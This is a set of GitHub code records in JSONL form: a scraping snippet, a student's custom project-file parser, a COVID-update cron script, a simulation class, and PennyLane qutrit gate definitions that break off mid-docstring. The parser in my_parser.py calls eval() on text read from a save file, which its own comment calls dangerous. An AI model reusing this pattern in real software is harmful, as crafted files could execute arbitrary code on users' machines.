pd.DataFrame({'No':no,'Nama':list_nama,'Gambar':list_gambar,'Harga':list_harga,'Link':list_link,'Terjual':list_terjual,'Lokasi':list_lokasi})\nwriter = pd.ExcelWriter('Macbook.xlsx')\ndf.to_excel(writer,'Sheet1',index=False)\nwriter.save()","repo_name":"fahmiSD/scrapingPy","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33806414976","text":"import time\nimport os\nimport enum\nimport json\nimport csv\nimport myc\n\n\nclass FileTypeCustome(enum.Enum):\n Project_Type = enum.auto()\n Graph_Data_Type_csv = enum.auto()\n Graph_Data_Type_json = enum.auto()\n Unknown_Type = enum.auto()\n Graph_Data_Image = enum.auto()\n\n\ndef xml_serializer(tobe: object):\n # print(\"serializer\")\n # print(repr(tobe))\n # \"\" -> \"bool\"\n T = str(type(tobe)).strip(\"<\").strip(\">\").strip(\"class\").strip(\" \")[1:-1]\n if T == \"bool\":\n # conv bool to int because that what python do anyway\n T = \"int\"\n ret_str = f\"[{T}]\"\n ret_str += \"{\\n\"\n if T == \"str\":\n # idk str types dissapear so here a bypass fix\n return \"[str]{\" + str(repr(tobe)) + \"}\\n\"\n # well to be effective any iter type doesn't work sooooo ...\n # if isinstance(my_iterable, (list, tuple, set, dict)):\n if T == \"dict\":\n # special for dict\n return \"[dict]\" + json.dumps(tobe) + \"\\n\"\n elif T == \"list\" or T == \"set\" or T == \"tuple\":\n # serializer by iter\n ret_str += \"(\"\n for x in tobe:\n ret_str += xml_serializer(x) + \",\"\n ret_str = ret_str[:-1]\n ret_str += \")\"\n ret_str += \"}\\n\"\n return ret_str\n else:\n # serializer by attr\n for attr in dir(tobe):\n if callable(getattr(tobe, attr)) or \"__\" in attr:\n continue\n # NOTE : just check if type of type is not first type\n # if attr == \"denominator\":\n # return \"[int]{\" + str(tobe) + \"}\\n\"\n if type(getattr(tobe, attr)) == type(tobe):\n # recursive type see note above\n # int(denominator=[int]->denominator.....)\n return f\"[{T}]\" + \"{\" + str(repr(tobe)) + \"}\"\n se = xml_serializer(getattr(tobe, attr))\n # print(se)\n ret_str += f\"{attr}={se},\" if se else \"\"\n # print(repr(ret_str))\n # remove the last char\n ret_str = ret_str[:-1]\n ret_str += \"}\\n\"\n return ret_str\n\n\ndef xml_parser(txt: str):\n print(\"parsing ...\")\n stack = []\n types = []\n args = []\n word = \"\"\n flag = False\n should_be = False\n should_be_two = False\n i = 0\n # print(txt)\n try:\n while i < len(txt):\n char = txt[i]\n # print(i, \"stack\", stack, \"types\", types,\"args\", args, \"word\", word, char)\n if word == \"Save_Project.xml\":\n flag = True\n word = \"\"\n elif char == \"\\n\":\n pass\n elif char == \",\":\n if not should_be and types[-1] != \"dict\":\n print(\" ',' not where it belong but anyway\")\n # raise RuntimeError(\" ',' not where it belong\")\n should_be = False\n elif char == \"[\":\n stack.append(\"]\")\n if word:\n args[len(types)-1].append(word)\n args.append([])\n word = \"\"\n elif char == \"{\":\n stack.append(\"}\")\n elif char == \"]\":\n if char != stack.pop():\n raise RuntimeError(\"parsing file wrong\")\n if word == \"dict\":\n inner_idk = \"\"\n i += 1\n while not txt[i-1] == \"}\":\n inner_idk += txt[i]\n i += 1\n # print(args, types)\n # print(inner_idk)\n args.pop()\n args[-1].append(json.loads(inner_idk))\n else:\n types.append(word)\n word = \"\"\n elif char == \"}\":\n if char != stack.pop():\n raise RuntimeError(\"parsing file wrong\")\n should_be = False\n # NOTE : eval here danger but don't worry\n T = types.pop()\n args[len(types)].append(word)\n # print(\"parsing Types\", T)\n if T == \"NoneType\":\n args.pop()\n args[len(types)-1].append(None)\n else:\n # print(\"eval that\")\n # print(\"stack : \", stack)\n # print(\"types : \", types)\n # print(\"args : \", args)\n # print(\"word : \", word)\n local_arg = [str(x) for x in args.pop()]\n # formating args\n # need to work with arg | arg,arg | arg = parameter ect\n format_arg = \"\"\n if not len(local_arg):\n format_arg = \",\"\n elif len(local_arg) == 1:\n # args[len(types)].append(word) || work == local_arg\n format_arg = word\n format_arg += \",\"\n else:\n # good old ways\n j = 0\n kwarg = False\n while j != len(local_arg):\n # print(format_arg)\n if \"=\" in local_arg[j]:\n # kwarg\n kwarg = True\n format_arg += local_arg[j]\n # check where is the \"=\"\n if (j+1) <= len(local_arg):\n # it could be in one single str\n if local_arg[j].split(\"=\")[1]:\n pass\n else:\n # else grab the next arg\n j += 1\n format_arg += local_arg[j]\n else:\n # end of stack\n print(i, \"stack\", stack, \"types\", types,\n \"args\", args, \"word\", word, char)\n raise RuntimeError(\n f\"parser kwarg : no more arg after = {local_arg[j]}\\n; j {j} ;len(local_arg) {len(local_arg)}\")\n format_arg += \",\"\n elif not kwarg:\n format_arg += local_arg[j]\n if local_arg[j] != \"(\" and local_arg[j] != \")\":\n format_arg += \",\"\n elif \"=\" not in local_arg[j] and kwarg:\n print(\"args after kwarg in parser ignore\",\n j, local_arg[j])\n if i+1 == len(local_arg):\n # if last arg after kwarg ignore append \",\" else char disapear\n format_arg += \",\"\n else:\n raise RuntimeError(\"unreachable\")\n j += 1\n # remove last \",\"\n if format_arg[-1] == \")\":\n # can't forget the trailing )\n format_arg = format_arg[:-2]\n format_arg += \")\"\n else:\n format_arg = format_arg[:-1]\n # format if last types\n # final conversion else there is a\n # pop on empty list so set the flag\n idk_flag = False\n if len(types)-1 < 0:\n idk_flag = True\n args.append([])\n # last one convertion\n # print(\"args\",args)\n # print(\"format_arg\", format_arg)\n # print(\n # f\"args[{len(types)-1}].append(eval({repr(T)}+\\\"(\\\"+{repr(format_arg)}+\\\")\\\"))\")\n # print()\n # try to eval if args not accepted at all try without (aka default values > none)\n try:\n args[len(types)-1].append(repr(eval(T+\"(\"+format_arg+\")\")))\n except Exception as ex:\n # print(ex)\n args[len(types)-1].append(repr(eval(T+\"()\")))\n if idk_flag:\n # actually with the repr to do with the strings\n # the return is in the forme of a lovely formated string\n # project(save_file_path='', menu_stack=[], GLOBAL={}, DATA_W=False)\n # but we need to eval it one more time to return it\n # no even going to try except it because how could there be an error we don't eval before\n # also the class type name is wrong\n # project -> myc.project\n # print(\"RETURN FINISH\")\n # print(args)\n args[-1][-1] = eval(T+\"(\"+format_arg+\")\")\n # print(\"eval\",args)\n should_be = True\n word = \"\"\n else:\n if should_be_two:\n # it doesn't work to well\n # as a matter of fact it work but it was the serializer\n print(str(i)+\" ',' expected but anyway\")\n should_be = False\n should_be_two = False\n if should_be:\n should_be_two = True\n word += char\n i += 1\n ret = args.pop()\n if len(args) or len(stack) or len(types) or not flag:\n raise RuntimeError(\"parser finish wrong\")\n return ret\n except Exception as ex:\n # all of thoses print are for debuging\n # print(\"error while casting in parsing project file\")\n # print(\"flag : \", flag)\n # print(\"stack : \", stack)\n # print(\"types : \", types)\n # print(\"args : \", args)\n # print(\"word : \", word)\n print(\"error in xml project file parser\")\n print(ex)\n raise ex\n # delete singleton intance to have default one\n myc.project._instances.pop()\n return [myc.project()]\n\n\ndef parse_Project_file(path: str = \"\"):\n if path:\n path = os.path.abspath(path)\n else:\n path = os.path.abspath(\n myc.project().save_file_path + \"./Save_Project.xml\")\n try:\n with open(path, \"r\") as f:\n # save old variable like path we want to keep\n local_pygame = myc.project().pygame\n local_tkinter = myc.project().tkinter\n local_gen = myc.project().gen\n # local_menu_stack = myc.project().menu_stack.copy()\n # here is a litlle trick\n # NOTE : menu stack set to None for the redirect import loop\n # should be reset by the parsing\n myc.project().menu_stack = None\n # we shoudl have that by reparsing the project file\n # however if the file is just a decoy then we known and reparse it\n # parse xml file with the custome parser\n objs = xml_parser(f.read(-1))\n if len(objs) > 1:\n raise RuntimeError(\n \"something worng at parsing project file , not suppose to have more than one object in file\")\n obj = objs[0]\n if obj.menu_stack is None:\n print(\"reparsing\")\n return parse_Project_file()\n # if we use the same graphic api we can reuse the api\n if (local_pygame and obj.tkinter) or (local_tkinter and obj.pygame):\n obj.menu_stack = [] # local_menu_stack\n if myc.project().menu_stack is None or not len(myc.project().menu_stack):\n if myc.project().pygame:\n raise NotImplementedError\n elif myc.project().tkinter:\n myc.project().menu_stack = [\"init\"]\n else:\n myc.project().menu_stack = []\n # print(\"parser obj\", obj)\n obj.pygame = local_pygame\n if local_pygame:\n obj.tkinter = False\n obj.pygame = True\n else:\n obj.tkinter = local_tkinter\n obj.pygame = False\n myc.project().gen = local_gen\n myc.project().DATA_W = False\n except Exception as ex:\n print(ex)\n\n\ndef parse_cvs_DATA(path: str = \"\"):\n if path:\n path = os.path.abspath(path)\n else:\n path = os.path.abspath(myc.project().save_file_path + \"./csv.csv\")\n try:\n with open(path, \"r\") as f:\n myc.project().DATA_W = False\n myc.project().DATA = []\n reader = csv.reader(f.read(-1), delimiter=\";\")\n num_rows = int(next(reader)[0])\n next(reader)\n num_columns = int(next(reader)[0])\n next(reader)\n x = list(reader)\n xi = 0\n for i in range(num_rows):\n myc.project().DATA.append([])\n for j in range(num_columns):\n # print(myc.project().DATA,i,j,xi,x)\n myc.project().DATA[i].append(int(x[xi][0]))\n xi += 2\n except Exception as ex:\n myc.project().DATA = None\n print(ex)\n myc.project().DATA_W = False\n quick_cache_save()\n\n\ndef save_cvs_DATA(path: str = \"\"):\n if path:\n path = os.path.abspath(path)\n else:\n path = os.path.abspath(\n myc.project().save_file_path + \"./csv.csv\")\n myc.project().conv_to_N()\n try:\n with open(path, \"w\") as f:\n f.write(str(myc.project().get_size()[0]))\n f.write(\"\\n\")\n f.write(str(myc.project().get_size()[1]))\n f.write(\"\\n\")\n for row in myc.project().DATA:\n for k, element in enumerate(row):\n f.write(str(int(element)))\n if k != myc.project().get_size()[1]-1:\n f.write(\";\")\n f.write(\"\\n\")\n except Exception as ex:\n print(ex)\n\n\ndef parse_json_DATA(path: str = \"\"):\n if path:\n path = os.path.abspath(path)\n else:\n path = os.path.abspath(myc.project().save_file_path + \"./json.json\")\n try:\n myc.project().DATA = json.load(open(path, \"r\"))\n # print(myc.project().DATA)\n print(\"json data imported\")\n except Exception as ex:\n myc.project().DATA_W = False\n myc.project().DATA = None\n print(ex)\n if isinstance(myc.project().DATA,dict):\n myc.project().DATA_W = True\n myc.project().conv_to_N()\n else:\n myc.project().DATA_W = False\n mode = myc.project().DATA_W\n quick_cache_save()\n myc.project().DATA_W = False ###! mode\n\n\ndef save_json_DATA(path: str = \"\"):\n if path:\n path = os.path.abspath(path)\n else:\n path = os.path.abspath(\n myc.project().save_file_path + \"./json.json\")\n try:\n myc.project().DATA_W = True\n json.dump(myc.project().conv_to_N().DATA, open(path, \"w\"))\n except Exception as ex:\n print(ex)\n\n\ndef quick_cache_save(path: str = \"\"):\n if path:\n path = os.path.abspath(path+\"./Save_Project.xml\")\n else:\n path = os.path.abspath(\n myc.project().save_file_path + \"./Save_Project.xml\")\n myc.project().DATA_W = False\n if myc.project().menu_stack is None or not len(myc.project().menu_stack):\n if myc.project().pygame:\n raise NotImplementedError\n elif myc.project().tkinter:\n myc.project().menu_stack = [\"init\"]\n else:\n myc.project().menu_stack = []\n try:\n with open(path, \"w\") as f:\n f.write(\"Save_Project.xml\\n\")\n f.write(\"[myc.project]{\")\n f.write(\"\\nDATA=\"+xml_serializer(myc.project().DATA))\n ###! f.write(\",DATA_W=\"+xml_serializer(myc.project().DATA_W))\n f.write(\",pygame=\"+xml_serializer(myc.project().pygame))\n f.write(\",tkinter=\"+xml_serializer(myc.project().tkinter))\n f.write(\",menu_stack=\"+xml_serializer(myc.project().menu_stack))\n f.write(\",resolver_mode=\"+xml_serializer(myc.project().resolver_mode))\n f.write(\",save_file_path=\" +\n (xml_serializer(myc.project().save_file_path) if myc.project().save_file_path else \"'./'\"))\n f.write(\"}\")\n except Exception as ex:\n print(ex)\n\n\ndef parse_file_all(path: str = None):\n if path is None:\n print(\"path is None in parse_file_all arg\")\n return FileTypeCustome.Unknown_Type\n print(\"parsing all\", path)\n ext = os.path.basename(path)[-3:]\n if ext == \".py\":\n return FileTypeCustome.Unknown_Type\n ext = os.path.basename(path)[-4:]\n if ext == \".xml\":\n parse_Project_file(path)\n return FileTypeCustome.Project_Type\n elif ext == \".csv\":\n parse_cvs_DATA(path)\n return FileTypeCustome.Graph_Data_Type_csv\n elif os.path.basename(path)[-5:] == \".json\":\n parse_json_DATA(path)\n return FileTypeCustome.Graph_Data_Type_json\n return FileTypeCustome.Unknown_Type\n\n\ndef quick_cache_load():\n if os.path.exists(os.path.abspath(myc.project().save_file_path + \"./Save_Project.xml\")):\n print(\"loading cache project...\")\n parse_Project_file(os.path.abspath(\n myc.project().save_file_path + \"./Save_Project.xml\"))\n else:\n print(\"no cache project file\")\n # print(myc.project().DATA)\n\n quick_cache_save()\n\n\nif __name__ == \"__main__\":\n quick_cache_save()\n time.sleep(1)\n print(quick_cache_load())\n","repo_name":"glados-creator/NSI_lycee","sub_path":"terminal/NSI_Projet_4/my_parser.py","file_name":"my_parser.py","file_ext":"py","file_size_in_byte":17806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35719424440","text":"\"\"\"\nThis file runs a basic cronjob every day to send a request to a PHP server\nthat gets and updates the current live WHO video.\n\"\"\"\n\nimport schedule\nimport requests\nfrom datetime import date, datetime\nfrom time import gmtime, strftime, sleep\n\ncountries = [\"ae\",\"ar\",\"at\",\"au\",\"be\",\"bg\",\"br\",\"ca\",\"ch\",\"cn\",\"co\",\"cu\",\"cz\",\"de\",\"eg\",\"fr\",\"gb\",\"gr\",\"hk\",\"hu\",\"id\",\"ie\",\"il\",\"in\",\"it\",\"jp\",\"kr\",\"lt\",\"lv\",\"ma\",\"mx\",\"my\",\"ng\",\"nl\",\"no\",\"nz\",\"ph\",\"pl\",\"pt\",\"ro\",\"rs\",\"ru\",\"sa\",\"se\",\"sg\",\"si\",\"sk\",\"th\",\"tr\",\"tw\",\"ua\",\"us\",\"ve\",\"za\"];\n\n# function to be run every minute\ndef live_updates():\n request = requests.get(\"https://covid19.xtrp.io/server/get_live_updates.php\")\n if(request.status_code == 200):\n print('Successful request with message: ' + request.text)\n else:\n print(\"ERROR: \" + str(request.status_code))\n\n# run function initially\nlive_updates()\n\n# start and run cronjob\nschedule.every().day.at(\"12:00\").do(live_updates)\n\nwhile True:\n schedule.run_pending()\n sleep(20)","repo_name":"xtrp/Coronavirus-Live-Monitor","sub_path":"cronjobs/live_updates.py","file_name":"live_updates.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"52"} +{"seq_id":"39096162610","text":"\nfrom .model import Model\nfrom .engine import Engine, BasicEngine\nfrom .activation import *\n\nclass Simulation:\n \"\"\"A self-contained simulation\"\"\"\n\n def __init__(self, \n model: Model,\n engine: Engine = None,\n steps: int = 10\n ):\n\n self._model = model \n self._engine = engine if engine else BasicEngine()\n self._steps = steps\n\n def run(self, steps = None):\n self._model.init_data()\n self._engine.run(self._model, steps if steps else self._steps)\n\n self.agent_data = self._model.agent_data().copy()\n self.model_data = self._model.model_data().copy()\n\n\n","repo_name":"dannygale/crowd","sub_path":"crowd/sim.py","file_name":"sim.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31504173012","text":"import numpy as np\n\nfrom pennylane.operation import Operation, AdjointUndefinedError\nfrom pennylane.wires import Wires\n\nOMEGA = np.exp(2 * np.pi * 1j / 3)\nZETA = OMEGA ** (1 / 3) # ZETA will be used as a phase for later non-parametric operations\n\n\nclass TShift(Operation):\n r\"\"\"TShift(wires)\n The qutrit shift operator\n\n The construction of this operator is based on equation 1 from\n `Yeh et al. (2022) `_.\n\n .. math:: TShift = \\begin{bmatrix}\n 0 & 0 & 1 \\\\\n 1 & 0 & 0 \\\\\n 0 & 1 & 0\n \\end{bmatrix}\n\n **Details:**\n\n * Number of wires: 1\n * Number of parameters: 0\n\n Args:\n wires (Sequence[int] or int): the wire the operation acts on\n \"\"\"\n num_wires = 1\n \"\"\"int: Number of wires that the operator acts on.\"\"\"\n\n num_params = 0\n \"\"\"int: Number of trainable parameters that the operator depends on.\"\"\"\n\n @staticmethod\n def compute_matrix():\n r\"\"\"Representation of the operator as a canonical matrix in the computational basis (static method).\n\n The canonical matrix is the textbook matrix representation that does not consider wires.\n Implicitly, this assumes that the wires of the operator correspond to the global wire order.\n\n .. seealso:: :meth:`~.TShift.matrix`\n\n Returns:\n ndarray: matrix\n\n **Example**\n\n >>> print(qml.TShift.compute_matrix())\n [[0 0 1]\n [1 0 0]\n [0 1 0]]\n \"\"\"\n return np.array([[0, 0, 1], [1, 0, 0], [0, 1, 0]])\n\n @staticmethod\n def compute_eigvals():\n r\"\"\"Eigenvalues of the operator in the computational basis (static method).\n\n If :attr:`diagonalizing_gates` are specified and implement a unitary :math:`U^{\\dagger}`,\n the operator can be reconstructed as\n\n .. math:: O = U \\Sigma U^{\\dagger},\n\n where :math:`\\Sigma` is the diagonal matrix containing the eigenvalues.\n\n Otherwise, no particular order for the eigenvalues is guaranteed.\n\n .. seealso:: :meth:`~.TShift.eigvals`\n\n Returns:\n array: eigenvalues\n\n **Example**\n\n >>> print(qml.TShift.compute_eigvals())\n [ -0.5+0.8660254j -0.5-0.8660254j 1. +0.j ]\n \"\"\"\n return np.array([OMEGA, OMEGA**2, 1])\n\n # TODO: Add compute_decomposition once parametric ops are added.\n\n def pow(self, z):\n return super().pow(z % 3)\n\n\nclass TClock(Operation):\n r\"\"\"TClock(wires)\n Ternary Clock gate\n\n The construction of this operator is based on equation 1 from\n `Yeh et al. (2022) `_.\n\n .. math:: TClock = \\begin{bmatrix}\n 1 & 0 & 0 \\\\\n 0 & \\omega & 0 \\\\\n 0 & 0 & \\omega^2\n \\end{bmatrix}\n\n where :math:`\\omega = e^{2 \\pi i / 3}`.\n\n **Details:**\n\n * Number of wires: 1\n * Number of parameters: 0\n\n Args:\n wires (Sequence[int] or int): the wire the operation acts on\n \"\"\"\n num_wires = 1\n \"\"\"int: Number of wires that the operator acts on.\"\"\"\n\n num_params = 0\n \"\"\"int: Number of trainable parameters that the operator depends on.\"\"\"\n\n @staticmethod\n def compute_matrix():\n r\"\"\"Representation of the operator as a canonical matrix in the computational basis (static method).\n\n The canonical matrix is the textbook matrix representation that does not consider wires.\n Implicitly, this assumes that the wires of the operator correspond to the global wire order.\n\n .. seealso:: :meth:`~.TClock.matrix`\n\n Returns:\n ndarray: matrix\n\n **Example**\n\n >>> print(qml.TClock.compute_matrix())\n [[ 1. +0.j 0. +0.j 0. +0.j ]\n [ 0. +0.j -0.5+0.8660254j 0. +0.j ]\n [ 0. +0.j 0. +0.j -0.5-0.8660254j]]\n \"\"\"\n return np.diag([1, OMEGA, OMEGA**2])\n\n @staticmethod\n def compute_eigvals():\n r\"\"\"Eigenvalues of the operator in the computational basis (static method).\n\n If :attr:`diagonalizing_gates` are specified and implement a unitary :math:`U^{\\dagger}`,\n the operator can be reconstructed as\n\n .. math:: O = U \\Sigma U^{\\dagger},\n\n where :math:`\\Sigma` is the diagonal matrix containing the eigenvalues.\n Otherwise, no particular order for the eigenvalues is guaranteed.\n\n .. seealso:: :meth:`~.TClock.eigvals`\n\n Returns:\n array: eigenvalues\n\n **Example**\n\n >>> print(qml.TClock.compute_eigvals())\n [ 1. +0.j -0.5+0.8660254j -0.5-0.8660254j]\n \"\"\"\n return np.array([1, OMEGA, OMEGA**2])\n\n # TODO: Add compute_decomposition() once parametric ops are added.\n\n def pow(self, z):\n return super().pow(z % 3)\n\n\nclass TAdd(Operation):\n r\"\"\"TAdd(wires)\n The 2-qutrit controlled add gate\n\n The construction of this operator is based on definition 7 from\n `Yeh et al. (2022) `_.\n It performs the controlled :class:`~.TShift` operation, and sends\n :math:`\\hbox{TAdd} \\vert i \\rangle \\vert j \\rangle = \\vert i \\rangle \\vert i + j \\rangle`,\n where addition is taken modulo 3. The matrix representation is\n\n .. math:: TAdd = \\begin{bmatrix}\n 1 & 0 & 0 & 0 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 1 & 0 & 0 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 1 & 0 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 1 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 0 & 0 & 1 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 0 & 0 & 0 & 1 \\\\\n 0 & 0 & 0 & 0 & 0 & 0 & 1 & 0 & 0\n \\end{bmatrix}\n\n .. note:: The first wire provided corresponds to the **control qutrit**.\n\n **Details:**\n\n * Number of wires: 2\n * Number of parameters: 0\n\n Args:\n wires (Sequence[int]): the wires the operation acts on\n \"\"\"\n num_wires = 2\n \"\"\"int: Number of wires that the operator acts on.\"\"\"\n\n num_params = 0\n \"\"\"int: Number of trainable parameters that the operator depends on.\"\"\"\n\n @staticmethod\n def compute_matrix():\n r\"\"\"Representation of the operator as a canonical matrix in the computational basis (static method).\n\n The canonical matrix is the textbook matrix representation that does not consider wires.\n Implicitly, this assumes that the wires of the operator correspond to the global wire order.\n\n .. seealso:: :meth:`~.TAdd.matrix`\n\n Returns:\n ndarray: matrix\n\n **Example**\n\n >>> print(qml.TAdd.compute_matrix())\n [[1 0 0 0 0 0 0 0 0]\n [0 1 0 0 0 0 0 0 0]\n [0 0 1 0 0 0 0 0 0]\n [0 0 0 0 0 1 0 0 0]\n [0 0 0 1 0 0 0 0 0]\n [0 0 0 0 1 0 0 0 0]\n [0 0 0 0 0 0 0 1 0]\n [0 0 0 0 0 0 0 0 1]\n [0 0 0 0 0 0 1 0 0]]\n \"\"\"\n return np.array(\n [\n [1, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 1],\n [0, 0, 0, 0, 0, 0, 1, 0, 0],\n ]\n )\n\n @staticmethod\n def compute_eigvals():\n r\"\"\"Eigenvalues of the operator in the computational basis (static method).\n\n If :attr:`diagonalizing_gates` are specified and implement a unitary :math:`U^{\\dagger}`,\n the operator can be reconstructed as\n\n .. math:: O = U \\Sigma U^{\\dagger},\n\n where :math:`\\Sigma` is the diagonal matrix containing the eigenvalues.\n Otherwise, no particular order for the eigenvalues is guaranteed.\n\n .. seealso:: :meth:`~.TAdd.eigvals`\n\n Returns:\n array: eigenvalues\n\n **Example**\n\n >>> print(qml.TAdd.compute_eigvals())\n [-0.5+0.8660254j -0.5-0.8660254j 1. +0.j -0.5+0.8660254j -0.5-0.8660254j 1. +0.j 1. +0.j 1. +0.j 1. +0.j ]\n \"\"\"\n return np.array([OMEGA, OMEGA**2, 1, OMEGA, OMEGA**2, 1, 1, 1, 1])\n\n # TODO: Add compute_decomposition() once parametric ops are added.\n\n def pow(self, z):\n return super().pow(z % 3)\n\n @property\n def control_wires(self):\n return Wires(self.wires[0])\n\n\nclass TSWAP(Operation):\n r\"\"\"TSWAP(wires)\n The ternary swap operator.\n\n This operation is analogous to the qubit SWAP and acts on two-qutrit computational basis states\n according to :math:`TSWAP\\vert i, j\\rangle = \\vert j, i \\rangle`. Its matrix representation is\n\n .. math:: TSWAP = \\begin{bmatrix}\n 1 & 0 & 0 & 0 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 0 & 1 & 0 & 0 \\\\\n 0 & 1 & 0 & 0 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 0 & 0 & 1 & 0 \\\\\n 0 & 0 & 1 & 0 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 1 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 0 & 0 & 0 & 1 \\\\\n \\end{bmatrix}\n\n **Details:**\n\n * Number of wires: 2\n * Number of parameters: 0\n\n Args:\n wires (Sequence[int]): the wires the operation acts on\n \"\"\"\n num_wires = 2\n num_params = 0\n \"\"\"int: Number of trainable parameters that the operator depends on.\"\"\"\n\n def label(self, decimals=None, base_label=None, cache=None):\n return base_label or \"TSWAP\"\n\n @staticmethod\n def compute_matrix(): # pylint: disable=arguments-differ\n r\"\"\"Representation of the operator as a canonical matrix in the computational basis (static method).\n\n The canonical matrix is the textbook matrix representation that does not consider wires.\n Implicitly, this assumes that the wires of the operator correspond to the global wire order.\n\n .. seealso:: :meth:`~.TSWAP.matrix`\n\n Returns:\n ndarray: matrix\n\n **Example**\n\n >>> print(qml.TSWAP.compute_matrix())\n [[1 0 0 0 0 0 0 0 0]\n [0 0 0 1 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0]\n [0 1 0 0 0 0 0 0 0]\n [0 0 0 0 1 0 0 0 0]\n [0 0 0 0 0 0 0 1 0]\n [0 0 1 0 0 0 0 0 0]\n [0 0 0 0 0 1 0 0 0]\n [0 0 0 0 0 0 0 0 1]]\n \"\"\"\n return np.array(\n [\n [1, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 0, 0],\n [0, 1, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 1],\n ]\n )\n\n @staticmethod\n def compute_eigvals():\n r\"\"\"Eigenvalues of the operator in the computational basis (static method).\n\n If :attr:`diagonalizing_gates` are specified and implement a unitary :math:`U^{\\dagger}`,\n the operator can be reconstructed as\n\n .. math:: O = U \\Sigma U^{\\dagger},\n\n where :math:`\\Sigma` is the diagonal matrix containing the eigenvalues.\n Otherwise, no particular order for the eigenvalues is guaranteed.\n\n .. seealso:: :meth:`~.TSWAP.eigvals`\n\n Returns:\n array: eigenvalues\n\n **Example**\n\n >>> print(qml.TSWAP.compute_eigvals())\n [ 1. -1. 1. -1. 1. -1. 1. 1. 1.]\n \"\"\"\n return np.array([1.0, -1.0, 1.0, -1.0, 1.0, -1.0, 1.0, 1.0, 1.0])\n\n # TODO: Add compute_decomposition()\n\n def pow(self, z):\n return super().pow(z % 2)\n\n def adjoint(self):\n return TSWAP(wires=self.wires)\n\n\nclass THadamard(Operation):\n r\"\"\"THadamard(wires, subspace)\n The ternary Hadamard operator\n\n Performs the Hadamard operation on a 2D subspace, if specified. The subspace is\n given as a keyword argument and determines which two of three single-qutrit basis states the\n operation applies to. When a subspace is not specified, the generalized Hadamard operation\n is used.\n\n The construction of this operator is based on section 2 of\n `Di et al. (2012) `_ when the subspace is specified, and\n definition 4 and equation 5 from `Yeh et al. (2022) `_\n when no subspace is specified. The operator definition of the ``subspace=None`` case is\n\n .. math:: \\text{THadamard} = \\frac{-i}{\\sqrt{3}}\\begin{bmatrix}\n 1 & 1 & 1 \\\\\n 1 & \\omega & \\omega^2 \\\\\n 1 & \\omega^2 & \\omega \\\\\n \\end{bmatrix}\n\n where :math:`\\omega = \\exp(2 \\pi i / 3)`.\n\n **Details:**\n\n * Number of wires: 1\n * Number of parameters: 0\n\n Args:\n wires (Sequence[int] or int): the wire the operation acts on\n subspace (Optional[Sequence[int]]): the 2D subspace on which to apply the operation.\n This should be `None` for the generalized Hadamard.\n\n **Example**\n\n The specified subspace will determine which basis states the operation actually\n applies to:\n\n >>> qml.THadamard(wires=0, subspace=(0, 1)).matrix()\n array([[ 0.70710678+0.j, 0.70710678+0.j, 0. +0.j],\n [ 0.70710678+0.j, -0.70710678+0.j, 0. +0.j],\n [ 0. +0.j, 0. +0.j, 1. +0.j]])\n\n >>> qml.THadamard(wires=0, subspace=(0, 2)).matrix()\n array([[ 0.70710678+0.j, 0. +0.j, 0.70710678+0.j],\n [ 0. +0.j, 1. +0.j, 0. +0.j],\n [ 0.70710678+0.j, 0. +0.j, -0.70710678+0.j]])\n\n >>> qml.THadamard(wires=0, subspace=(1, 2)).matrix()\n array([[ 1. +0.j, 0. +0.j, 0. +0.j],\n [ 0. +0.j, 0.70710678+0.j, 0.70710678+0.j],\n [ 0. +0.j, 0.70710678+0.j, -0.70710678+0.j]])\n\n >>> qml.THadamard(wires=0, subspace=None).matrix()\n array([[ 0. -0.57735027j, 0. -0.57735027j, 0. -0.57735027j],\n [ 0. -0.57735027j, 0.5+0.28867513j, -0.5+0.28867513j],\n [ 0. -0.57735027j, -0.5+0.28867513j, 0.5+0.28867513j]])\n \"\"\"\n num_wires = 1\n num_params = 0\n \"\"\"int: Number of trainable parameters that the operator depends on.\"\"\"\n\n def label(self, decimals=None, base_label=None, cache=None):\n return base_label or \"TH\"\n\n def __init__(self, wires, subspace=None):\n self._subspace = Operation.validate_subspace(subspace) if subspace is not None else None\n self._hyperparameters = {\n \"subspace\": self.subspace,\n }\n\n super().__init__(wires=wires)\n\n @property\n def subspace(self):\n \"\"\"The 